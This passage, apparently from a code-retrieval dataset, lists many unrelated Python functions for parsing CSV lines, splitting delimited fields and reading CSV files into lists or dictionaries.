self.__fieldnames__ = self.__remove_break_line__(self.__fieldnames__)\n self.__fieldnames__ = self.__split_for_delimiter__(self.__fieldnames__)", "def _build_data_from_text(self, text):\n # get CSV field\n text = text.split(self._data_sep)[self._data_col]\n # tokenize\n return super()._build_data_from_text(text)", "def mapper_data_cleaning(self, l, line):\n lineitems = line.split(\",\")\n yield (lineitems[0], lineitems[2])", "def split_values(self, value):\n if value:\n return [s.strip() for s in value.split(',')]\n else:\n return []", "def csv_reader(filepath):\n with open(filepath) as f: \n for row in f: \n row = row.strip()\n r = list()\n part = '' \n is_double_quoted = False\n\n for c in row: \n if c == ',': \n if is_double_quoted is False:\n r.append(part)\n part = ''\n else: \n part += c\n elif c == '\\\"': \n is_double_quoted = not is_double_quoted\n else: \n part += c\n if part != '': \n r.append(part)\n\n yield r", "def process_line(line):\n\n name_comp_list = []\n givenname_comp_list = []\n surname_comp_list = []\n geocode_comp_list = []\n locality_comp_list = []\n date1_comp_list = []\n date2_comp_list = []\n\n # Split the line into the basic fields - - - - - - - - - - - - - - - - - - -\n #\n if (config.in_file_type in ['CSV','CSVQ','TAB','TABQ']):\n # Comma or tabulator separated\n try:\n line_list = config.line_parser.parse(line)\n except:\n log_message('CSV line parsing failed with inout: '+line,'err')\n\n if (len(line_list) < config.input_len):\n log_message('Input line does not contain enough fields,' +\\\n 'fill up with empty fields','warn')\n while 
(len(line_list) < config.input_len):\n line_list.append('')\n\n config.curr_line_list = line_list # Save current line list\n\n # Extract fields into different component lists - - - - - - - - - - - - - -\n #\n if (config.input_component['name'] != []): # Extract name fields\n for i in config.input_component['name']:\n name_comp_list.append(line_list[i])\n\n else: # Extract givenname and surname into separate components - - - - - -\n if (config.input_component['givenname'] != []): # Extract g-name fields\n for i in config.input_component['givenname']:\n givenname_comp_list.append(line_list[i])\n\n if (config.input_component['surname'] != []): # Extract surname fields\n for i in config.input_component['surname']:\n surname_comp_list.append(line_list[i])\n\n if (config.input_component['geocode'] != []): # Extract geocode fields\n for i in config.input_component['geocode']:\n geocode_comp_list.append(line_list[i])\n\n if (config.input_component['locality'] != []): # Extract locality fields\n for i in config.input_component['locality']:\n locality_comp_list.append(line_list[i])\n\n if (config.input_component['date1'] != []): # Extract date1 fields\n for i in config.input_component['date1']:\n date1_comp_list.append(line_list[i])\n\n if (config.input_component['date2'] != []): # Extract date2 fields\n for i in config.input_component['date2']:\n date2_comp_list.append(line_list[i])\n\n elif (config.in_file_type == 'COL'): # Column based input file - - - - - - -\n\n if (len(line) < config.input_len):\n log_message('Input line is not long enough, fill up with spaces','warn')\n line += ' '*(config.input_len-len(line))\n\n if (config.input_component['name'] != []): # Extract name fields\n for (col_start,length) in config.input_component['name']:\n name_comp_list.append(line[col_start,col_start+length])\n\n else: # Extract givenname and surname into separate components - - - - - -\n if (config.input_component['givenname'] != []): # Extract g-name fields\n for (col_start,length) in config.input_component['givenname']:\n givenname_comp_list.append(line[col_start,col_start+length])\n\n if (config.input_component['surname'] != []): # Extract surname fields\n for (col_start,length) in config.input_component['surname']:\n surname_comp_list.append(line[col_start,col_start+length])\n\n if (config.input_component['geocode'] != []): # Extract geocode fields\n for (col_start,length) in config.input_component['geocode']:\n geocode_comp_list.append(line[col_start,col_start+length])\n\n if (config.input_component['locality'] != []): # Extract locality fields\n for (col_start,length) in config.input_component['locality']:\n locality_comp_list.append(line[col_start,col_start+length])\n\n if (config.input_component['date1'] != []): # Extract date1 fields\n for (col_start,length) in config.input_component['date1']:\n date1_comp_list.append(line[col_start,col_start+length])\n\n if (config.input_component['date2'] != []): # Extract date2 fields\n for (col_start,length) in config.input_component['date2']:\n date2_comp_list.append(line[col_start,col_start+length])\n\n # elif (config.in_file_type == 'SQL'): # - - - - - - - - - - - - - - - - - -\n\n ################################\n # Add later: SQL database access\n ################################\n\n msg = [' Component basic field lists:', \\\n ' Name: '+str(name_comp_list), \\\n ' Given name: '+str(givenname_comp_list), \\\n ' Surname: '+str(surname_comp_list), \\\n ' Geocode: '+str(geocode_comp_list), \\\n ' Locality: '+str(locality_comp_list), \\\n ' Date1: 
'+str(date1_comp_list), \\\n ' Date2: '+str(date2_comp_list)]\n log_message(msg,'v2')\n\n name_comp = ''\n givenname_comp = ''\n surname_comp = ''\n geocode_comp = ''\n locality_comp = ''\n date1_comp = ''\n date2_comp = ''\n\n # Now clean and then concatenate component lists into strings - - - - - - - -\n #\n if (name_comp_list != []): # Name component\n name_comp = name_comp_list[0] # Start with first field in list\n\n for f in name_comp_list[1:]: # Loop over following fields (if any)\n if (f != ''):\n if (config.input_space_sep['name'] == 1):\n sep = ' ' # Set separator to space between fields\n else:\n sep = '' # No space between fields\n\n # Check field spilling only if space separator is set to ' ' \n #\n if (sep == ' ') and (config.input_check_spilling['name'] == 1):\n sep = check_field_spill(name_comp, f)\n\n name_comp = name_comp+sep+f # Append separator and field\n\n if (givenname_comp_list != []): # Givenname component - - - - - - - - - - -\n givenname_comp = givenname_comp_list[0] # Start with first field in list\n\n for f in givenname_comp_list[1:]: # Loop over following fields (if any)\n if (f != ''):\n if (config.input_space_sep['givenname'] == 1):\n sep = ' ' # Set separator to space between fields\n else:\n sep = '' # No space between fields\n\n # Check field spilling only if space separator is set to ' ' \n #\n if (sep == ' ') and (config.input_check_spilling['givenname'] == 1):\n sep = check_field_spill(givenname_comp, f)\n\n givenname_comp = givenname_comp+sep+f # Append separator and field\n\n if (surname_comp_list != []): # Surname component - - - - - - - - - - - - -\n surname_comp = surname_comp_list[0] # Start with first field in list\n\n for f in surname_comp_list[1:]: # Loop over following fields (if any)\n if (f != ''):\n if (config.input_space_sep['surname'] == 1):\n sep = ' ' # Set separator to space between fields\n else:\n sep = '' # No space between fields\n\n # Check field spilling only if space separator is set to ' ' \n #\n if (sep == ' ') and (config.input_check_spilling['surname'] == 1):\n sep = check_field_spill(surname_comp, f)\n\n surname_comp = surname_comp+sep+f # Append separator and field\n\n if (geocode_comp_list != []): # Geocode component - - - - - - - - - - - - -\n geocode_comp = geocode_comp_list[0] # Start with first field in list\n\n for f in geocode_comp_list[1:]: # Loop over following fields (if any)\n if (f != ''):\n if (config.input_space_sep['geocode'] == 1):\n sep = ' ' # Set separator to space between fields\n else:\n sep = '' # No space between fields\n\n # Check field spilling only if space separator is set to ' ' \n #\n if (sep == ' ') and (config.input_check_spilling['geocode'] == 1):\n sep = check_field_spill(geocode_comp, f)\n\n geocode_comp = geocode_comp+sep+f # Append separator and field\n\n if (locality_comp_list != []): # Locality component - - - - - - - - - - - -\n locality_comp = locality_comp_list[0] # Start with first field in list\n\n for f in locality_comp_list[1:]: # Loop over following fields (if any)\n if (f != ''):\n if (config.input_space_sep['locality'] == 1):\n sep = ' ' # Set separator to space between fields\n else:\n sep = '' # No space between fields\n\n # Check field spilling only if space separator is set to ' ' \n #\n if (sep == ' ') and (config.input_check_spilling['locality'] == 1):\n sep = check_field_spill(locality_comp, f)\n\n locality_comp = locality_comp+sep+f # Append separator and field\n\n if (date1_comp_list != []): # Date1 component - - - - - - - - - - - - - - -\n date1_comp = 
date1_comp_list[0] # Start with first field in list\n\n for f in date1_comp_list[1:]: # Loop over following fields (if any)\n if (f != ''):\n if (config.input_space_sep['date1'] == 1):\n sep = ' ' # Set separator to space between fields\n else:\n sep = '' # No space between fields\n\n # Check field spilling only if space separator is set to ' ' \n #\n if (sep == ' ') and (config.input_check_spilling['date1'] == 1):\n if (date1_comp[-1] != ' ') and (f[0] != ' '):\n tmp_list0 = date1_comp.split()\n tmp_list1 = f.split()\n check_word = tmp_list0[-1]+tmp_list1[0]\n\n if (check_word in ['jan','feb','mar','apr','may','jun','jul','aug', \\\n 'sep','oct','nov','dec','january','february','march','april', \\\n 'may','june','july','august','september','october','november', \\\n 'december']):\n\n sep = '' # Set separator to no space\n msg = ' Correct date1 word spilling: \"'+date1_comp+'\",\"'+f+'\"'\n log_message(msg,'v1')\n\n date1_comp = date1_comp+sep+f # Append separator and field\n\n if (date2_comp_list != []): # Date2 component - - - - - - - - - - - - - - -\n date2_comp = date2_comp_list[0] # Start with first field in list\n\n for f in date2_comp_list[1:]: # Loop over following fields (if any)\n if (f != ''):\n if (config.input_space_sep['date2'] == 1):\n sep = ' ' # Set separator to space between fields\n else:\n sep = '' # No space between fields\n\n # Check field spilling only if space separator is set to ' ' \n #\n if (sep == ' ') and (config.input_check_spilling['date2'] == 1):\n if (date2_comp[-1] != ' ') and (f[0] != ' '):\n tmp_list0 = date1_comp.split()\n tmp_list1 = f.split()\n check_word = tmp_list0[-1]+tmp_list1[0]\n\n if (check_word in ['jan','feb','mar','apr','may','jun','jul','aug', \\\n 'sep','oct','nov','dec','january','february','march','april', \\\n 'may','june','july','august','september','october','november', \\\n 'december']):\n\n sep = '' # Set separator to no space\n msg = ' Correct date1 word spilling: \"'+date1_comp+'\",\"'+f+'\"'\n log_message(msg,'v1')\n\n date2_comp = date2_comp+sep+f # Append separator and field\n\n # Check if name component is given or givenname and surname separately - - -\n #\n if (config.input_component['givenname'] != []) or \\\n (config.input_component['surname'] != []):\n name_comp = [givenname_comp, surname_comp]\n\n msg = [' Components:', \\\n ' Name: \"'+str(name_comp)+'\"', \\\n ' Geocode: \"'+geocode_comp+'\"', \\\n ' Locality: \"'+locality_comp+'\"', \\\n ' Date1: \"'+date1_comp+'\"', \\\n ' Date2: \"'+date2_comp+'\"']\n log_message(msg,'v1')\n\n return [name_comp, geocode_comp, locality_comp, date1_comp, date2_comp]", "def read_csv_to_list(in_file, headless=True, delim='\\t'):\n ret_list=list()\n with open(in_file,'r') as csv_file:\n my_reader = csv.reader(csv_file, delimiter=delim) \n if headless:\n next(my_reader)\n for row in my_reader:\n ret_list.append(list(row))\n return(ret_list)", "def args_to_list(csv, allow_empty, arg_type=int, allow_negative=True):\n arg_vals = [arg_type(d) for d in str(csv).split(',')]\n if not allow_negative:\n arg_vals = [v for v in arg_vals if v >= 0]\n if not allow_empty and len(arg_vals) == 0:\n return None\n return arg_vals", "def values_list(self, *fields, **kwargs):\r\n flat = kwargs.pop('flat', False)\r\n if kwargs:\r\n raise TypeError('Unexpected keyword arguments to values_list: %s'\r\n % (kwargs.keys(),))\r\n if flat and len(fields) > 1:\r\n raise TypeError(\"'flat' is not valid when values_list is called with more than one field.\")\r\n clone = self.only(fields)\r\n clone._values_list = 
True\r\n clone._flat_values_list = flat\r\n return clone", "def _read_csv(cls, input_file, quotechar=None):\n with open(input_file, \"r\", encoding=\"utf-8-sig\") as f:\n return list(csv.reader(f, delimiter=\",\", quotechar=quotechar))", "def _read_csv(cls, input_file, quotechar=None):\n with open(input_file, \"r\", encoding=\"utf-8-sig\") as f:\n return list(csv.reader(f, delimiter=\",\", quotechar=quotechar))", "def split_line(line: str) -> [str]:\n return line.strip().split(',')", "def to_python(self, value):\n # Return an empty list if no input was given.\n if not value:\n return []\n return value.split(',')", "def fileFiltSelFieldsRecGen(filePath, filt, columns, delim = \",\"):\n\tcolumns = strToIntArray(columns, delim)\n\twith open(filePath, \"r\") as fp:\n\t\tfor line in fp:\t\n\t\t\tline = line[:-1]\n\t\t\tif delim is not None:\n\t\t\t\tline = line.split(delim)\n\t\t\tif filt(line):\n\t\t\t\tselected = extractList(line, columns)\n\t\t\t\tyield selected", "def read(self, line):\n data = []\n if six.PY3 and type(line) == six.binary_type:\n line = line.decode('utf-8')\n\n csv_reader = csv.reader(six.StringIO(line),\n delimiter=self.delimiter,\n quotechar=self.quotechar,\n skipinitialspace=True)\n for cr in csv_reader:\n data = [decode_string(f).strip() for f in cr]\n break\n\n return None, data", "def get_column_value_list(\n filenames: List[str],\n column_name: str,\n debug: Optional[bool] = False\n) -> List[Any]:\n result = []\n for file_name in filenames:\n\n # Open the file for reading\n file_in = codecs.open(file_name, 'rU')\n dialect = csv.Sniffer().sniff(file_in.read(1024))\n file_in.seek(0)\n data_in = csv.reader(file_in, dialect=dialect, delimiter=str(','))\n\n if debug:\n print('Parsing file ' + file_name)\n\n line_number = 0\n header_detected = False\n col_idx = -1\n for data in data_in:\n # Count the line number to flag anomalies\n line_number += 1\n\n # If mark has not been detected yet\n if not header_detected:\n if column_name not in data:\n # Line does not match, skip it\n continue\n\n # At this point the column has been detected\n header_detected = True\n\n # Get index of the column\n col_idx = data.index(column_name)\n\n # Proceed with the following lines\n continue\n\n # Safety check. If something went wrong when the CSV file was\n # exported, it is very likely that the string #REF! is present. If\n # so, notify and stop.\n if '#REF!' 
in data or '#VALUE' in data:\n print('Line', line_number, 'contains incorrect data',\n file=sys.stderr)\n sys.exit(1)\n\n # At this point we are processing a data line\n\n # If the number of fields doesn't match number of columns, flag!\n if col_idx >= len(data):\n print('Mismatched line', line_number, 'skipping',\n file=sys.stderr)\n continue\n\n # append the string\n result.append(data[col_idx])\n\n return result", "def extract_cfda(field, type):\n extracted_values = []\n if field:\n entries = [entry.strip() for entry in field.split(';')]\n if type == 'numbers':\n extracted_values = [entry[:entry.index(' ')] for entry in entries]\n else:\n extracted_values = [entry[entry.index(' ')+1:] for entry in entries]\n return ', '.join(extracted_values)", "def csv_to_field_CampaignLanguages(entity, value):\n if value is None or value == '':\n return\n splitter = re.compile(r';')\n entity.string = splitter.split(value)", "def parse_ftp_list_line(ftp_list_line):\n return FTPListDataParser().parse_line(ftp_list_line)", "def feed(self, inline, endchar=None):\n # preserve the original line\n # for error messages\n if endchar is None:\n self.origline = inline\n inline = inline.lstrip()\n #\n outlist = []\n comma_needed = False\n found_comma = False\n while inline:\n # NOTE: this sort of operation would be quicker\n # with lists - but then can't use regexes\n thischar = inline[0]\n if thischar == '#':\n # reached a comment\n # end of the line...\n break\n #\n if thischar == endchar:\n return outlist, inline[1:]\n #\n if comma_needed:\n if thischar == ',':\n inline = inline[1:].lstrip()\n comma_needed = False\n found_comma = True\n continue\n raise BadLineError('Line is badly built :\\n%s' % self.origline)\n #\n try:\n # the character that marks the end of the list\n listend = self.liststart[thischar]\n except KeyError:\n pass\n else:\n if not self.recursive and endchar is not None:\n raise BadLineError('Line is badly built :\\n%s' % self.origline)\n newlist, inline = self.feed(inline[1:], endchar=listend)\n outlist.append(newlist)\n inline = inline.lstrip()\n comma_needed = True\n continue\n #\n if thischar in self.quotes:\n # this might raise an error\n # FIXME: trap the error and raise a more appropriate one ?\n element, inline = unquote(inline, fullquote=False, \n retain=self.retain)\n inline = inline.lstrip()\n outlist.append(element)\n comma_needed = True\n continue\n #\n # must be an unquoted element\n mat = unquoted.match(inline)\n if mat is not None:\n # FIXME: if the regex was better we wouldn't need an rstrip\n element = mat.group(1).rstrip()\n # group 2 will be ``None`` if we reach the end of the line\n inline = mat.group(2) or ''\n outlist.append(element)\n comma_needed = True\n continue\n # or it's a badly built line\n raise BadLineError('Line is badly built :\\n%s' % self.origline)\n #\n # if we've been called recursively\n # we shouldn't have got this far\n if endchar is not None:\n raise BadLineError('Line is badly built :\\n%s' % self.origline)\n #\n if not found_comma:\n # if we didn't find a comma\n # the value could be a nested list\n if outlist:\n outlist = outlist[0]\n else:\n outlist = ''\n if self.force_list and not isinstance(outlist, list):\n if outlist:\n outlist = [outlist]\n else:\n outlist = []\n if not self.comment:\n if inline:\n raise CommentError('Comment not allowed :\\n%s' % self.origline)\n return outlist\n return outlist, inline", "def listify(item, do_strip=False):\n if not item:\n return []\n elif isinstance(item, list):\n return item\n elif isinstance(item, 
string_types) and item.count(','):\n if do_strip:\n return [token.strip() for token in item.split(',')]\n else:\n return item.split(',')\n else:\n return [item]", "def f(data: Dict):\n if field in data and isinstance(data[field], List):\n data[field] = \",\".join(data[field])", "def csv_line(input_list):\n good_strings = [csv_friendly_string(x) for x in input_list]\n return string.join(good_strings, \",\") + \"\\n\"", "def _get_data(self, input_data: str) -> None:\n\t\tdata: List[str]\n\t\t# Set data to a single-element list of [\"None\"]\n\t\tif input_data is None:\n\t\t\tself._data = [\"None\"]\n\t\t\treturn\n\t\t# Strip input data to prevent leading/trailing space interfering with type determination\n\t\traw_data: str = input_data.strip()\n\n\t\t# Get separator, or set data to a single-element list before exiting\n\t\tif \",\" in raw_data:\n\t\t\t# Set separator values\n\t\t\tself.sep_char = \",\"\n\t\t\tself.sep_str = \", \"\n\t\telif \"|\" in raw_data:\n\t\t\t# Set separator values\n\t\t\tself.sep_char = \"|\"\n\t\t\tself.sep_str = \" | \"\n\t\telif \" \" in raw_data:\n\t\t\t# Set separator values\n\t\t\tself.sep_char = \" \"\n\t\t\tself.sep_str = \" \"\n\t\telse:\n\t\t\t# If not a list, set to a single-element list, then exit.\n\t\t\tself._data = [raw_data]\n\t\t\treturn\n\n\t\t# Split, then strip whitespace\n\t\tdata = raw_data.split(self.sep_char)\n\t\tfor i in range(len(data)):\n\t\t\tdata[i] = data[i].strip()\n\n\t\t# Return\n\t\tself._data = data", "def parse_csv(csv, as_ints=False):\n items = []\n for val in csv.split(\",\"):\n val = val.strip()\n if val:\n items.append(int(val) if as_ints else val)\n return items", "def to_list(name, default=[], separator=\":\"):\n value = get(name)\n if value is None:\n return list(default)\n return [e.strip() for e in value.split(separator)]", "def read_data_from_csv(csv_file, header=None, **kwargs):\n if os.path.isabs(csv_file) == False:\n path_to_csv = os.path.join(csv_file)\n else:\n path_to_csv = csv_file\n row_list = []\n if \"field_sep\" not in kwargs.keys():\n field_sep = ','\n else:\n field_sep = kwargs.get(\"field_sep\")\n with open(path_to_csv, mode='r') as csv_file:\n csv_reader = csv.DictReader(csv_file, delimiter=field_sep, fieldnames=header)\n for record in csv_reader:\n if list(record.values())[0].startswith(\"#\") is not True:\n # IT'S A COMMENT IF IT STARTS WITH \"#\" \n # IF THIS IS YOUR HEADER ROW, SUPPLY A LIST OF COLUMN NAMES WHEN CALLING THE FUNCTION\n row_list.append(record)\n return row_list", "def read_csv(file_name, return_the_header=False, delimiter=',', quote_char='|'):\n with open(file_name, newline='') as csvfile:\n reader = csv.reader(csvfile, delimiter=delimiter, quotechar=quote_char)\n if return_the_header:\n next(reader) # Skip header row\n data = []\n for row in reader:\n data.append(row)\n return data", "def str2set(string_field, separator=','):\n\n def wrapper(self):\n \"\"\"Decorator wrapper method.\n \"\"\"\n cleaned_data = self.cleaned_data\n\n string_data = cleaned_data.get(string_field)\n\n list_data = []\n for string in string_data.split(separator):\n string_strip = string.strip()\n if string_strip and string_strip not in list_data:\n list_data.append(string_strip)\n\n return list_data\n\n return wrapper", "def expand_rows(row, delimited_fields, expand_row):\n\n # _log.debug('expand_row is {}'.format(expand_row))\n # go through the delimited fields and clean up the rows\n copy_row = copy.deepcopy(row)\n for d in delimited_fields:\n if d in copy_row:\n copy_row[d] = 
expand_and_normalize_field(copy_row[d], False)\n\n if expand_row:\n new_values = []\n for d in delimited_fields:\n fields = []\n if d in copy_row:\n for value in expand_and_normalize_field(copy_row[d], True):\n fields.append({d: value})\n new_values.append(fields)\n\n # return all combinations of the lists\n combinations = list(itertools.product(*new_values))\n\n new_rows = []\n for c in combinations:\n new_row = copy.deepcopy(copy_row)\n # c is a tuple because of the .product command\n for item in c:\n for k, v in item.items():\n new_row[k] = v\n new_rows.append(new_row)\n\n return new_rows\n else:\n return [copy_row]", "def parse(self):\n result = []\n for field in self.get_fields():\n result.append(field.get_field())\n return result", "def _convert_str_to_list(cls, v: Union[List[str], str]) -> List[str]:\n if isinstance(v, str):\n return v.split(\",\")\n return v # cov: ignore", "def extractFields(line, delim, keepIndices):\n\titems = line.split(delim)\n\tnewLine = []\n\tfor i in keepIndices:\n\t\tnewLine.append(line[i])\n\treturn delim.join(newLine)", "def getSentenceList(row, field):\n\n return list(row[field].sents)", "def parse(\n to_parse: ParsableValues,\n remove_duplicates: bool = True,\n read_files: bool = False,\n domains_to_addrs: bool = False,\n only_addresses: bool = False,\n addrs_to_domains: bool = False,\n only_hostnames: bool = False\n) -> List[str]:\n if isinstance(to_parse, bytes):\n to_parse = to_parse.decode('utf-8')\n\n if isinstance(to_parse, list):\n return normalize(to_parse)", "def convert_line(line):\n line = line.strip().replace(\"]\", \"\").replace(\"[\", \"\")\n return line.split(\",\")", "def listed_data(self, reader):\n result = []\n for line in reader:\n result.append(line)\n return result", "def parse(raw_file, delimiter):\n\t#open csv file\n\topened_file = open(raw_file)\n\t\n\t#read csv file\n\tcsv_data = csv.reader(opened_file,delimiter=delimiter)\n\t\n\t#build parsed data\n\tparsed_data = []\n\t\n\t#define headers\n\tfields = csv_data.next()\n\t\n\t#Iterate over each row of the csv file, zip together field->value pairs\n\tfor row in csv_data:\n\t\tparsed_data.append(dict(zip(fields, row)))\n\t\n\t#close csv file\n\topened_file.close()\n\t\n\treturn parsed_data", "def parse_line(line):\n tok = line.replace('[', '').replace(']', '').split(', ')\n list = [tok[0]]\n tok = tok[1:]\n temp = list\n parse_line_helper(temp, tok)\n return list", "def cdd_convert(string, field=self.field()):\n return [field(x) for x in string.split()]", "def fileSelFieldsRecGen(dirPath, columns, delim=\",\"):\n\tif type(columns) == str:\n\t\tcolumns = strToIntArray(columns, delim)\n\tfor rec in fileRecGen(dirPath, delim):\n\t\textracted = extractList(rec, columns)\n\t\tyield extracted", "def split(value, delimiter):\n return value.split(delimiter)", "def get_csv():\n with requests.Session() as s:\n download = s.get(CSV_URL)\n decoded_content = download.content.decode('utf-8')\n cr = csv.reader(decoded_content.splitlines(), delimiter=',')\n my_list = list(cr)\n return [row[2] for row in my_list[1:]]", "def values_list(self, *args, **kwargs):\n flat = kwargs.pop(\"flat\", False)\n if kwargs:\n raise AttributeError(f\"Unknown kwargs: {kwargs}\")\n if flat and len(args) != 1:\n raise ValueError(\"flat=True requires exactly one field name\")\n try:\n only_fields = tuple(self._get_field_path(arg) for arg in args)\n except ValueError as e:\n raise ValueError(f\"{e.args[0]} in values_list()\")\n new_qs = self._copy_self()\n new_qs.only_fields = only_fields\n new_qs.return_format = 
self.FLAT if flat else self.VALUES_LIST\n return new_qs", "def read_csv_to_list(csv_path):\n\n with open(csv_path, newline=\"\") as f:\n reader = csv.reader(f)\n data = list(reader)\n\n return data", "def explode(delim, val, limit = None): \n if limit != None:\n return val.split(delim, limit)\n else:\n return val.split(delim)", "def getList(self,section,option,sep=\";\"):\n value=ConfigParser.SafeConfigParser.get(self,section,option)\n value=value.strip('\"')\n vallist=value.split(sep)\n return vallist", "def read_sample_csv(self):\n f = open('sample.csv')\n lines = f.readline()\n fields = lines.split(',')\n fieldnames_lst = [i.strip() for i in fields]\n f.close()\n return fieldnames_lst", "def parse(raw_file, delimiter):\n\n opened_file = open(raw_file, 'rU')\n csv_data = csv.reader(opened_file, delimiter=delimiter)\n\n parsed_data = []\n\n fields = csv_data.next()\n\n for row in csv_data:\n parsed_data.append(dict(zip(fields,row)))\n\n opened_file.close()\n\n return parsed_data", "def process_data(data, enc=None, delim=None):\n if enc is None:\n enc = detect_encoding(data)\n if delim is None:\n delim = csv_sniff(data[0], enc)\n csv_data = []\n if sys.version_info.major < 3:\n csv_obj = csv.reader(data, delimiter=delim.encode(enc))\n for row in csv_obj:\n row = [str(x, enc) for x in row]\n csv_data.append(row)\n else:\n data = [i.decode(enc) for i in data]\n csv_obj = csv.reader(data, delimiter=delim)\n for row in csv_obj:\n csv_data.append(row)\n return pad_data(csv_data)", "def fileSelFieldValueGen(dirPath, column, delim=\",\"):\n\tfor rec in fileRecGen(dirPath, delim):\n\t\tyield rec[column]", "def getlist(x, y):\n return get(x, y).split(',')", "def _read_csv(cls, input_file, quotechar=None):\n with open(input_file, \"r\", encoding=\"utf-8-sig\") as f:\n return list(csv.reader(f, delimiter=\"\\n\", quotechar=quotechar))", "def read_csv(csv_file_path):\n res = [] #list\n # f = open(csv_file_path) #read file\n with open(csv_file_path,\"r\") as f:", "def parse_list(value: str) -> list[str]:\n segments = _QUOTED_SEGMENT_RE.findall(value)\n for segment in segments:\n left, match, right = value.partition(segment)\n value = ''.join([left, match.replace(',', '\\000'), right])\n return [_dequote(x.strip()).replace('\\000', ',') for x in value.split(',')]", "def _extract(self, row):\n if not self._head:\n self._head = self._create_head(row)\n if self._args.head:\n return\n\n if 'extract' not in self._state:\n self._state['extract'] = self._replace_fields(self._args.extract)\n\n r = list(map(self._convert, row))\n return eval(self._state['extract'])", "def getList(self,section, option): \n unparsedOption=self.get(section, option)\n if unparsedOption.find(',')>0:\n splittedValue=unparsedOption.split(',')\n strippedValue=[]\n while splittedValue:\n valuePart=splittedValue.pop(0)\n strippedValue.append(valuePart.strip())\n result=strippedValue\n else: result=unparsedOption\n return result", "def CSV(id_poke):\r\n poke = [] #creer une liste vide\r\n with open('BDD/pokemon.csv') as csv_file: #ouvre le fichier pokemon.csv\r\n csv_reader = csv.reader(csv_file, delimiter=',') #place les lignes du csv dans une variable\r\n for row in csv_reader: #parcours des lignes du csv\r\n if row[0] == str(id_poke): #si l'id de la ligne = id du pokemon\r\n poke = list(row) #variable = ligne correspondante dans le csv\r\n return(poke) #retourne une liste avec les caracteristiques du poke\r", "def values(line):\n return [v.strip() or None for v in text(line).split(',')]", "def decode_csv(records,\n record_defaults,\n 
field_delim=\",\",\n use_quote_delim=True,\n name=None,\n na_value=\"\",\n select_cols=None):\n return decode_csv_v2(\n records, record_defaults,\n field_delim, use_quote_delim,\n na_value, select_cols, name\n )", "def serialize_field(field: str) -> Callable[[Dict], None]:\n\n def f(data: Dict):\n \"\"\"\n Serialize specific field of type list\n \"\"\"\n if field in data and isinstance(data[field], List):\n data[field] = \",\".join(data[field])\n\n return f", "def split_line(line):\n if ',' in line:\n return [a.strip() for a in line.split(',')]\n return line.split()", "def parse_protein_ids(csv_field, sep=\"<|>\"):\n clean = csv_field.replace(\"decoy_\", \"\").strip()\n prot_id_set = set(clean.split(sep))\n return prot_id_set", "def convert_comma_separated_str_to_list(input_str: str, trim: bool = True) -> List[str]:\n comma_separated_str = input_str.strip() if trim else input_str\n if not comma_separated_str:\n return []\n\n result = []\n for part_str in comma_separated_str.split(\",\"):\n value = part_str\n if trim:\n value = value.strip()\n if not value:\n continue\n result.append(value)\n return result", "def field_from_native(self, data, files, field_name, into):\n if field_name in data:\n data = data.copy()\n try:\n # data is a querydict when using forms\n data[field_name] = ','.join(data.getlist(field_name))\n except AttributeError:\n data[field_name] = ','.join(data[field_name])\n return super(MultiSelectField, self).field_from_native(data, files, field_name, into)", "def loadCSVFile (file, sep=\";\"):\n lst = lt.newList(\"ARRAY_LIST\") #Usando implementacion arraylist\n #lst = lt.newList() #Usando implementacion linkedlist\n print(\"Cargando archivo ....\")\n t1_start = process_time() #tiempo inicial\n dialect = csv.excel()\n dialect.delimiter=sep\n try:\n with open(file, encoding=\"utf-8\") as csvfile:\n spamreader = csv.DictReader(csvfile, dialect=dialect)\n for row in spamreader: \n lt.addLast(lst,row)\n except:\n print(\"Hubo un error con la carga del archivo\")\n t1_stop = process_time() #tiempo final\n print(\"Tiempo de ejecución \",t1_stop-t1_start,\" segundos\")\n return lst", "def process_list_arg(arg):\n if isinstance(arg, list):\n return arg\n elif isinstance(arg, basestring):\n args = []\n for part in arg.split(\",\"):\n args.append(part.strip())\n return args", "def FE_split_one_field_into_many(df_in, field, splitter, filler, new_names_list='', add_count_field=False):\r\n df_field = df_in[field].values\r\n df = copy.deepcopy(df_in)\r\n ### First copy whatever is in that field so we can save it for later ###\r\n df[field].fillna(filler, inplace=True)\r\n if add_count_field:\r\n ### there will be one extra field created when we count the number of contents in each field ###\r\n max_things = df[field].map(lambda x: len(x.split(splitter))).max() + 1\r\n else:\r\n max_things = df[field].map(lambda x: len(x.split(splitter))).max()\r\n if len(new_names_list) == 0:\r\n print(' Max. columns created by splitting %s field is %d.' %(\r\n field,max_things))\r\n else:\r\n if not max_things == len(new_names_list):\r\n print(\"\"\" Max. columns created by splitting %s field is %d but you have given %d \r\n variable names only. Selecting first %d\"\"\" %(\r\n field,max_things,len(new_names_list),len(new_names_list)))\r\n ### This creates a new field that counts the number of things that are in that field.\r\n if add_count_field:\r\n #### this counts the number of contents after splitting each row which varies. 
Hence it helps.\r\n num_products_viewed = 'Content_Count_in_'+field\r\n df[num_products_viewed] = df[field].map(lambda x: len(x.split(splitter))).values\r\n ### Clean up the field such that it has the right number of split chars otherwise add to it\r\n ### This fills up the field with empty strings between each splitter. You can't do much about it.\r\n #### Leave this as it is. It is not something you can do right now. It works.\r\n fill_string = splitter + filler\r\n df[field] = df[field].map(lambda x: x+fill_string*(max_things-len(x.split(splitter))) if len(\r\n x.split(splitter)) < max_things else x)\r\n ###### Now you create new fields by split the one large field ########\r\n if isinstance(new_names_list, str):\r\n if new_names_list == '':\r\n new_names_list = [field+'_'+str(i) for i in range(1,max_things+1)]\r\n else:\r\n new_names_list = [new_names_list]\r\n ### First fill empty spaces or NaNs with filler ###\r\n df.loc[df[field] == splitter, field] = filler\r\n for i in range(len(new_names_list)):\r\n try:\r\n df[new_names_list[i]] = df[field].map(lambda x: x.split(splitter)[i]\r\n if splitter in x else filler)\r\n except:\r\n df[new_names_list[i]] = filler\r\n continue\r\n ### there is really nothing you can do to fill up since they are filled with empty strings.\r\n #### Leave this as it is. It is not something you can do right now. It works.\r\n df[field] = df_field\r\n return df, new_names_list", "def from_csv(value_string):\n if not value_string:\n return []\n if value_string[0] == \"[\" and value_string[-1] == \"]\":\n value_string = value_string[1:-1]\n else:\n # This is a single string entry, any comma contained\n # is part of the value and must not be used to\n # split up the string.\n return [value_string]\n\n if not value_string:\n return []\n stream = StringIO(value_string)\n stream.seek(0)\n reader = csv.reader(stream, dialect=\"excel\")\n return list(reader)[0]" ]
